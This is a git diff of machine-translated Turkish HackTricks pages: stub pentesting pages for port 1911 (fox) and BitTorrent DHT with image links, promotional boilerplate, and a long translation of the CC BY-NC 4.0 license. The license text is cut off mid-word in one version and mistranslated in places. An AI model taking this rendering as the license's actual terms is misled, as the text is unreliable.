Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

This commit is contained in:
Translator 2024-07-18 18:41:33 +00:00
parent 5a40235502
commit 47a6cd91ad
94 changed files with 3030 additions and 3334 deletions

View file

@ -1,18 +1,19 @@
# 1911 - Pentesting fox
{% hint style="success" %}
AWS Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'ı Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* Hacking püf noktalarını paylaşarak PR'ler göndererek [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
Ve daha fazla hizmet:
@ -24,4 +25,16 @@ dht udp "DHT Düğümleri"
![](<.gitbook/assets/image (273).png>)
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1)
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
InfluxDB
![](<.gitbook/assets/image (337).png>)
![](<.gitbook/assets/image (338).png>)
![](<.gitbook/assets/image (339).png>)
![](<.gitbook/assets/image (340).png>)
![](<.gitbook/assets/image (341).png>)

View file

@ -1,30 +1,14 @@
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
</details>
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,91 +1,109 @@
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **pull request** göndererek paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
<a rel="license" href="https://creativecommons.org/licenses/by-nc/4.0/"><img alt="Creative Commons Lisansı" style="border-width:0" src="https://licensebuttons.net/l/by-nc/4.0/88x31.png" /></a><br>Telif Hakkı © Carlos Polop 2021. Başka şekilde belirtilmediği sürece (kitaba kopyalanan harici bilgilerin orijinal yazarlara ait olduğu), Carlos Polop tarafından <a href="https://github.com/carlospolop/hacktricks">HACK TRICKS</a> üzerindeki metin, <a href="https://creativecommons.org/licenses/by-nc/4.0/">Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)</a> lisansı altında lisanslanmıştır.
<a rel="license" href="https://creativecommons.org/licenses/by-nc/4.0/"><img alt="Creative Commons Lisansı" style="border-width:0" src="https://licensebuttons.net/l/by-nc/4.0/88x31.png" /></a><br>Telif Hakkı © Carlos Polop 2021. Başka şekilde belirtilmedikçe (kitaba kopyalanan harici bilgilerin orijinal yazarlara ait olduğu), Carlos Polop'un <a href="https://github.com/carlospolop/hacktricks">HACK TRICKS</a> metni <a href="https://creativecommons.org/licenses/by-nc/4.0/">Creative Commons Atıf-GayriTicari 4.0 Uluslararası Lisansı (CC BY-NC 4.0)</a> altında lisanslanmıştır.
Lisans: Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)<br>
İnsanlar Tarafından Okunabilir Lisans: https://creativecommons.org/licenses/by-nc/4.0/<br>
Tam Hukuki Şartlar: https://creativecommons.org/licenses/by-nc/4.0/legalcode<br>
Biçimlendirme: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown<br>
Lisans: Atıf-GayriTicari 4.0 Uluslararası (CC BY-NC 4.0)<br>İnsan Okunabilir Lisans: https://creativecommons.org/licenses/by-nc/4.0/<br>Tam Hukuki Şartlar: https://creativecommons.org/licenses/by-nc/4.0/legalcode<br>Biçimlendirme: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown<br>
# creative commons
# Attribution-NonCommercial 4.0 International
# Atıf-GayriTicari 4.0 Uluslararası
Creative Commons Corporation (“Creative Commons”), bir hukuk firması değildir ve hukuki hizmetler veya hukuki tavsiye sağlamaz. Creative Commons'un kamu lisanslarını dağıtması, avukat-müvekkil veya diğer bir ilişki yaratmaz. Creative Commons, lisanslarını ve ilgili bilgileri "olduğu gibi" temelinde sunar. Creative Commons, lisansları, şartlar ve koşullarına tabi olarak lisanslanan materyaller veya ilgili bilgilerden kaynaklanan herhangi bir zarardan dolayı hiçbir garanti vermez. Creative Commons, mümkün olan en geniş ölçüde kullanımlarından kaynaklanan zararlardan tüm sorumluluğu reddeder.
Creative Commons Corporation ("Creative Commons") bir hukuk firması değildir ve hukuki hizmetler veya hukuki danışmanlık sağlamaz. Creative Commons genel lisanslarının dağıtımı, avukat-müvekkil veya diğer ilişkiler yaratmaz. Creative Commons lisanslarını ve ilgili bilgileri "olduğu gibi" temelinde sunar. Creative Commons, lisansları, şartları ve koşulları altında lisanslanan materyalleri veya ilgili bilgileri kullanmaktan kaynaklanan zararlardan dolayı her türlü sorumluluğu reddeder.
## Creative Commons Kamu Lisanslarını Kullanma
## Creative Commons Genel Lisanslarının Kullanımı
Creative Commons kamu lisansları, yaratıcıların ve diğer hak sahiplerinin, telif hakkı ve belirli diğer haklara tabi olan orijinal eserleri ve diğer materyalleri paylaşmak için kullanabilecekleri standart bir dizi şart ve koşul sağlar. Aşağıdaki düşünceler yalnızca bilgilendirme amaçlı olup, eksiksiz değildir ve lisanslarımızın bir parçası değildir.
Creative Commons genel lisansları, yaratıcıların ve diğer hak sahiplerinin, telif hakkı ve belirli diğer haklara tabi olan orijinal eserleri ve diğer materyalleri paylaşmak için kullanabilecekleri standart bir dizi terim ve koşul sağlar. Aşağıdaki düşünceler yalnızca bilgilendirme amaçlı olup, eksiksiz değildir ve lisanslarımızın bir parçası değildir.
* __Lisans verenler için düşünceler:__ Kamu lisanslarımız, telif hakkı ve belirli diğer haklar tarafından sınırlanan şekillerde malzemeyi kullanma izni verme yetkisine sahip olanlara yönelik olarak tasarlanmıştır. Lisanslarımız geri alınamaz. Lisans verenler, uygulamadan önce seçtikleri lisansın şartlarını okumalı ve anlamalıdır. Lisans verenler, malzemeyi beklenildiği gibi yeniden kullanabilmesi için lisanslarımızı uygulamadan önce gerekli tüm hakları sağlamalıdır. Lisans verenler, lisansa tabi olmayan herhangi bir malzemeyi açıkça belirtmelidir. Bu, diğer CC lisanslı malzemeleri veya telif hakkı istisnası veya sınırlaması altında kullanılan malzemeleri içerir. [Lisans verenler için daha fazla düşünce](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors).
* __Lisans verenler için düşünceler:__ Genel lisanslarımız, telif hakkı ve belirli diğer haklar tarafından kısıtlanan materyalleri halka kullanma izni verme yetkisine sahip olanlar tarafından kullanılmak üzere tasarlanmıştır. Lisanslarımız geri alınamaz. Lisans verenler, uygulamadan önce seçtikleri lisansın şartlarını okumalı ve anlamalıdır. Lisans verenler, materyali beklenildiği gibi halkın yeniden kullanabilmesi için lisanslarımızı uygulamadan önce gerekli tüm hakları güvence altına almalıdır. Lisans verenler, lisansa tabi olmayan herhangi bir materyali açıkça işaretlemelidir. Bu, diğer CC lisanslı materyalleri veya telif hakkı istisnası veya kısıtlaması altında kullanılan materyalleri içerir. [Lisans verenler için daha fazla düşünce](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors).
* __Halk için düşünceler:__ Kamu lisanslarımızdan birini kullanarak, bir lisans veren, belirli şartlar ve koşullar altında lisanslı malzemeyi kullanma izni verir. Lisans verenin izni herhangi bir nedenle gerekli değilse - örneğin, telif hakkı istisnası veya sınırlaması nedeniyle - o kullanım lisans tarafından düzenlenmez. Lisanslarımız, yalnızca bir lisans verenin yetki sahibi olduğu telif hakkı ve belirli diğer haklar kapsamında izinler verir. Lisanslı malzemenin kullanımı, başkalarının malzemede telif hakkı veya diğer haklara sahip olması nedeniyle hala sınırlı olabilir. Bir lisans veren, tüm değişikliklerin işaretlenmesini veya açıklanmasını isteme gibi özel taleplerde bulunabilir. Lisanslarımız tarafından gerektirilmese de, makul olan yerlerde bu talepleri saygı göstermeniz teşvik edilir. [Halk için daha fazla düşünce](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees).
* __Halk için düşünceler:__ Genel lisanslarımızdan birini kullanarak, bir lisans veren lisanslanmış materyali belirli şartlar ve koşullar altında kullanma izni verir. Lisans verenin izni herhangi bir nedenle gerekli değilse - örneğin, telif hakkı istisnası veya kısıtlaması nedeniyle - o zaman bu kullanım lisans tarafından düzenlenmez. Lisanslarımız, yalnızca bir lisans verenin yetkili olduğu telif hakkı ve belirli diğer haklar altında izinler verir. Lisanslanmış materyalin kullanımı, diğer nedenlerden dolayı hala kısıtlanabilir, çünkü başkaları materyalde telif hakkı veya diğer haklara sahip olabilir. Bir lisans veren, tüm değişikliklerin işaretlenmesini veya açıklanmasını isteme gibi özel taleplerde bulunabilir. Lisanslarımız tarafından gerekli olmasa da, makul olan yerlerde bu talepleri saygı göstermeniz teşvik edilir. [Halk için daha fazla düşünce](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees).
# Creative Commons Attribution-NonCommercial 4.0 International Kamu Lisansı
# Creative Commons Atıf-GayriTicari 4.0 Uluslararası Genel Lisansı
Lisanslı Hakları (aşağıda tanımlanmıştır) kullanarak, bu Creative Commons Attribution-NonCommercial 4.0 International Kamu Lisansı ("Kamu Lisansı") şartlarına bağlı olduğunuzu kabul eder ve bu şartlar ve koşulların kabulünüz karşılığında Lisanslı Hakları kabul eder ve Lisansör, Lisanslı Malzemeyi bu şartlar ve koşullar altında kullanılabilir hale getirmekten kaynaklanan faydalar karşılığında size bu hakları verir.
Lisans Haklarını (aşağıda tanımlandığı şekilde) kullanarak, bu Creative Commons Atıf-GayriTicari 4.0 Uluslararası Genel Lisansı ("Genel Lisans") şartlarına bağlı olduğunuzu kabul eder ve onaylarsınız. Bu Genel Lisansın bir sözleşme olarak yorumlanabileceği ölçüde, bu şartları ve koşulları kabul etmeniz karşılığında Lisans Hakları size verilir ve Lisans veren, Lisanslı Materyali bu şartlar ve koşullar altında kullanıma sunarak elde ettiği faydalar karşılığında size bu hakları verir.
## Bölüm 1 - Tanımlar.
a. __Uyarlanmış Malzeme__, Lisanslı Malzemeye dayanan veya Lisanslı Malzemeye dayanan ve Lisanslı Malzemeyi, Lisansör tarafından sahip olunan Telif Hakkı ve Benzer Haklar kapsamında izin gerektiren şekilde çevrilen, değiştirilen, düzenlenen, dönüştürülen veya başka şekilde değiştirilen Telif Hakkı ve Benzer Haklar kapsamındaki Malzeme anlamına gelir. Bu Kamu Lisansı için, Lisanslı Malzeme bir müzik eseri, performansı veya ses kaydı ise, Uyarlanmış Malzeme, Lisanslı Malzemenin hareketli bir görüntü ile zamanlı ilişkide senkronize edildiği yerlerde her zaman üretilir.
a. __Uyarlanmış Materyal__, Lisanslı Materyal'den türetilen veya Lisanslı Materyal'e dayanan ve Lisans verenin sahip olduğu Telif Hakkı ve Benzer Haklar kapsamında izin gerektiren şekilde çevrilen, değiştirilen, düzenlenen, dönüştürülen veya başka şekilde değiştirilen materyali ifade eder. Bu Genel Lisans için, Lisanslı Materyal bir müzik eseri, performans veya ses kaydı ise, Uyarlanmış Materyal, Lisanslı Materyal'in bir hareketli görüntü ile zamanlama ilişkisinde senkronize edildiği durumda her zaman üretilir.
b. __Adaptörün Lisansı__, bu Kamu Lisansının şartları ve koşulları uyarınca Adapted Mal
## Bölüm 2 - Kapsam.
b. __Adaptörün Lisansı__, Uyarlanmış Materyale yaptığınız katkılardaki Telif Hakkı ve Benzer Haklarınıza uyguladığınız lisansı ifade eder ve bu Genel Lisansın şartlarına uygun olarak yapılır.
c. __Telif Hakkı ve Benzer Haklar__, Telif Hakkı ve Benzer Haklarla yakından ilişkili olan telif hakkı ve/veya telif hakkına sıkı sıkıya bağlı diğer hakları, performans, yayın, ses kaydı ve Sui Generis Veritabanı Hakları dahil olmak üzere, hakların nasıl etiketlendiği veya kategorize edildiğine bakılmaksızın ifade eder. Bu Genel Lisans için, Bölüm 2(b)(1)-(2)'de belirtilen haklar Telif Hakkı ve Benzer Haklar değildir.
d. __Etkili Teknolojik Önlemler__, uygun yetki olmadan atlatılamayan önlemleri ifade eder ve 20 Aralık 1996 tarihinde kabul edilen WIPO Telif Hakkı Sözleşmesi'nin 11. Maddesi uyarınca yükümlülükleri yerine getiren yasalar altında atlatılamaz.
e. __İstisnalar ve Kısıtlamalar__, kullanımınıza tabi olan Telif Hakkı ve Benzer Haklar için geçerli olan hakkaniyet, adil kullanım ve/veya başka bir istisna veya kısıtlama anlamına gelir.
f. __Lisanslı Materyal__, Lisans verenin bu Genel Lisansı uyguladığı sanatsal veya edebi eser, veritabanı veya diğer materyali ifade eder.
g. __Lisanslı Haklar__, Lisans verenin lisanslamaya yetkili olduğu Telif Hakkı ve Benzer Haklarınızın tümüne sınırlı olan ve Lisanslı Materyalin kullanımınıza tabi olan tüm Telif Hakkı ve Benzer Haklarını ifade eder.
h. __Lisans veren__, bu Genel Lisans altında haklar veren birey(ler) veya kurum(lar)ı ifade eder.
i. __GayriTicari__, ticari avantaj veya maddi karşılık amacı gütmeyen anlamına gelir. Bu Genel Lisans için, Lisanslı Materyalin dijital dosya paylaşımı veya benzeri yollarla başka Telif Hakkı ve Benzer Haklar kapsamındaki materyal karşılığında sunulması, bu değişimle ilgili maddi karşılık ödenmediği sürece GayriTicari olarak kabul edilir.
j. __Paylaşım__, Lisanslı Haklar altında izin gerektiren herhangi bir şekilde veya süreçle materyali halka sunmak anlamına gelir, çoğaltma, genel gösterim, genel performans, dağıtım, yayınlama, iletim veya ithalat gibi, ve materyali halka sunmak için, halkın materyale kendi seçtikleri bir yerden ve zamandan erişebileceği şekillerde materyali erişilebilir hale getirmek anlamına gelir.
k. __Sui Generis Veritabanı Hakları__, Avrupa Parlamentosu ve Konseyi'nin 11 Mart 1996 tarihli 96/9/EC Sayılı Direktifi'nden kaynaklanan telif hakkı dışındaki hakları ve dünyanın herhangi bir yerinde diğer esasen eşdeğer hakları ifade eder.
l. __Siz__, bu Genel Lisans altında Lisanslı Hakları kullanma yetkisine sahip olan birey veya kurumu ifade eder. "Sizin" karşılığı vardır.
## Bölüm 2 Kapsam.
a. ___Lisans verme.___
1. Bu Kamu Lisansı'nın şartlarına tabi olarak, Lisansör, size, Lisanslı Malzeme üzerinde Lisanslı Hakları kullanma hakkı verir:
1. Bu Kamu Lisansı'nın şartlarına tabi olarak, Lisans Sahibi, size Düzenlenmiş Materyal üzerinde Lisanslı Hakları kullanma yetkisi verir:
A. Lisanslı Malzemenin tamamını veya bir kısmını yalnızca Ticari Olmayan amaçlarla çoğaltmak ve Paylaşmak; ve
A. Yalnızca Kar Amacı Gütmeyen amaçlar için Lisanslı Materyali tamamen veya kısmen çoğaltma ve Paylaşma; ve
B. Ticari Olmayan amaçlarla Uyarlanmış Malzeme üretmek, çoğaltmak ve Paylaşmak.
B. Kar Amacı Gütmeyen amaçlar için Uyarlanmış Materyali üretme, çoğaltma ve Paylaşma.
2. __İstisnalar ve Sınırlamalar.__ Şüpheye mahal vermemek için, İstisnalar ve Sınırlamalar kullanımınıza uygulandığında, bu Kamu Lisansı uygulanmaz ve şartlarına uymak zorunda değilsiniz.
2. __İstisnalar ve Sınırlamalar.__ Şüpheye mahal vermemek için, İstisnalar ve Sınırlamaların kullanımınıza uygulandığı durumlarda, bu Kamu Lisansı geçerli değildir ve şartlarına uymak zorunda değilsiniz.
3. __Süre.__ Bu Kamu Lisansının süresi Bölüm 6(a)'da belirtilmiştir.
4. __Medya ve formatlar; teknik değişikliklere izin verilir.__ Lisansör, Lisanslı Hakları şu anda bilinen veya gelecekte oluşturulan tüm medya ve formatlarda kullanmanıza ve bunun için gerekli teknik değişiklikleri yapmanıza izin verir. Lisansör, Lisanslı Hakları kullanmak için gerekli teknik değişiklikleri, Etkili Teknolojik Önlemleri atlatmak için gerekli teknik değişiklikleri yapmanızı yasaklamama veya yetki vermemeyi feragat eder. Bu Kamu Lisansı için, yalnızca bu Bölüm 2(a)(4) tarafından yetkilendirilen değişiklikler, Uyarlanmış Malzeme üretmez.
4. __Medya ve formatlar; teknik değişikliklere izin verilir.__ Lisans Sahibi, Lisanslı Hakları şu anda bilinen veya gelecekte oluşturulacak tüm medya ve formatlarda kullanmanıza ve bunu yapabilmek için gerekli teknik değişiklikleri yapmanıza izin verir. Lisans Sahibi, Lisanslı Hakları kullanmak için gerekli teknik değişiklikleri yapmanızı yasaklama veya yetki verme hakkından feragat eder ve/veya böyle yapmanızı engellemek için herhangi bir hakkı veya yetkisi olmadığını kabul eder. Bu Kamu Lisansı kapsamında, yalnızca bu Bölüm 2(a)(4) tarafından yetkilendirilen değişiklikler Adapted Materyal üretmez.
5. __Aşağı akış alıcıları.__
5. __Aşağı akış alıcılar.__
A. __Lisansörden teklif - Lisanslı Malzeme.__ Lisanslı Malzemenin her alıcısı, Lisansörden bu Kamu Lisansı'nın şartlarına tabi olarak Lisanslı Hakları kullanma teklifi otomatik olarak alır.
A. __Lisans Sahibinden Teklif Lisanslı Materyal.__ Lisanslı Materyalin her alıcısı, Lisans Sahibinden bu Kamu Lisansı'nın şartlarına göre Lisanslı Hakları kullanma teklifi alır.
B. __Aşağı akış kısıtlamaları yok.__ Lisanslı Malzemenin Lisanslı Haklarının kullanımını kısıtlayan herhangi ek veya farklı şart veya koşul uygulayamazsınız veya uygulayamazsınız.
B. __Aşağı akış kısıtlamaları yok.__ Eğer yaparsanız, Lisanslı Materyal üzerinde Lisanslı Hakları kullanma hakkını kısıtlayan herhangi bir ek veya farklı şart veya koşul uygulayamazsınız veya uygulayamazsınız. Lisanslı Materyalin herhangi bir alıcısının Lisanslı Hakları kullanımını kısıtlarsa, Etkili Teknolojik Önlemler uygulayamazsınız.
6. __Onay yok.__ Bu Kamu Lisansı'ndaki hiçbir şey, Lisansör veya Bölüm 3(a)(1)(A)(i)'de belirtilen diğer kişilerin, sizin veya Lisanslı Malzemenin kullanımının Lisansör veya diğerleri tarafından bağlantılı olduğunu, sponsor olduğunu, onaylandığını veya resmi statü verildiğini iddia etme veya ima etme izni vermez veya ima etmez.
6. __Onay yok.__ Bu Kamu Lisansında yer alan hiçbir şey, sizin veya Lisanslı Materyalin kullanımınızın, Lisans Sahibi veya diğerleri tarafından sağlanan atıfta bulunma hakkına sahip olduğunuzu veya bununla bağlantılı olduğunuzu, sponsor olduğunuzu veya resmi statü verildiğini iddia etme veya ima etme izni vermez veya böyle bir şeyi ima etmez.
b. ___Diğer haklar.___
1. Bütünlük hakkı gibi ahlaki haklar bu Kamu Lisansı kapsamında lisanslanmamıştır, ayrıca tanıtım, gizlilik ve/veya diğer benzer kişilik hakları da lisanslanmamıştır; ancak mümkün olduğunca, Lisansör, Lisanslı Hakları kullanmanıza izin vermek için gerekli olan bu tür hakları, ancak başka bir şekilde değil, feragat eder veya yetki vermez.
1. Ahlaki haklar, bütünlük hakkı gibi haklar bu Kamu Lisansı kapsamında lisanslanmaz, ayrıca tanıtım, gizlilik ve/veya diğer benzer kişilik hakları da lisanslanmaz; ancak mümkün olduğunca, Lisans Sahibi, size Lisanslı Hakları kullanmanıza izin vermek için gerekli olan sınırlı ölçüdeki bu tür hakları iddia etmekten feragat eder ve/veya böyle bir hak iddia etmeyeceğini kabul eder.
2. Patent ve ticari marka hakları bu Kamu Lisansı kapsamında lisanslanmamıştır.
2. Patent ve ticari marka hakları bu Kamu Lisansı kapsamında lisanslanmaz.
3. Mümkün olduğunca, Lisansör, Ticari Olmayan amaçlar dışında Lisanslı Malzemenin kullanımı için doğrudan veya gönüllü veya feragat edilebilir yasal veya zorunlu lisanslama düzenlemesi kapsamında bir toplama kuruluşu aracılığıyla sizden telif ücreti talep etme hakkından feragat eder. Diğer tüm durumlarda, Lisansör, Ticari Olmayan amaçlar dışında Lisanslı Malzemenin kullanıldığı durumlarda da telif ücreti talep etme hakkınııkça saklı tutar.
3. Mümkün olduğunca, Lisans Sahibi, Lisanslı Hakları kullanımınızdan dolayı doğrudan veya gönüllü veya feragat edilebilir yasal veya zorunlu lisanslama düzenlemesi kapsamında bir toplama kuruluşu aracılığıyla sizden telif ücreti talep etme hakkından feragat eder. Diğer tüm durumlarda, Lisans Sahibi, Lisanslı Materyal Kar Amacı Gütmeyen amaçlar dışında kullanıldığında dâhil olmak üzere, böyle telif ücreti talep etme hakkınııkça saklı tutar.
## Bölüm 3 - Lisans Koşulları.
## Bölüm 3 Lisans Koşulları.
Lisanslı Haklarınızın kullanımı açıkça aşağıdaki koşullara tabidir.
Lisanslı Haklarınızın kullanımı aşağıdaki koşullara tabidir.
a. ___Atıf.___
1. Lisanslı Malzemeyi (değiştirilmiş şekliyle birlikte) Paylaşırsanız, aşağıdakileri yapmalısınız:
1. Eğer Lisanslı Materyali (değiştirilmiş şekilde de olsa) Paylaşırsanız, şunları yapmalısınız:
A. Lisanslı Malzeme ile birlikte Lisansör tarafından sağlanmışsa aşağıdakileri koruyun:
A. Lisanslı Materyal ile birlikte Lisans Sahibi tarafından sağlanmışsa aşağıdakileri saklamalısınız:
i. Lisanslı Malzemenin yaratıcı(lar)ının ve atıfta bulunması istenen diğer kişilerin kimlik bilgilerini, Lisansör tarafından talep edilen herhangi bir makul şekilde (atıfta bulunması istenen takma adla birlikte);
i. Lisanslı Materyalin yaratıcı(lar)ının ve atıfta bulunulacak diğer kişilerin kimliklerini, Lisans Sahibi tarafından talep edilen herhangi bir makul şekilde (belirtilen takma ad da dahil olmak üzere) koruma;
ii. bir telif hakkı bildirimi;
@ -93,65 +111,84 @@ iii. bu Kamu Lisansına atıfta bulunan bir bildirim;
iv. garanti reddine atıfta bulunan bir bildirim;
v. makul ölçüde mümkünse Lisanslı Malzemeye URI veya hiperbağlantı;
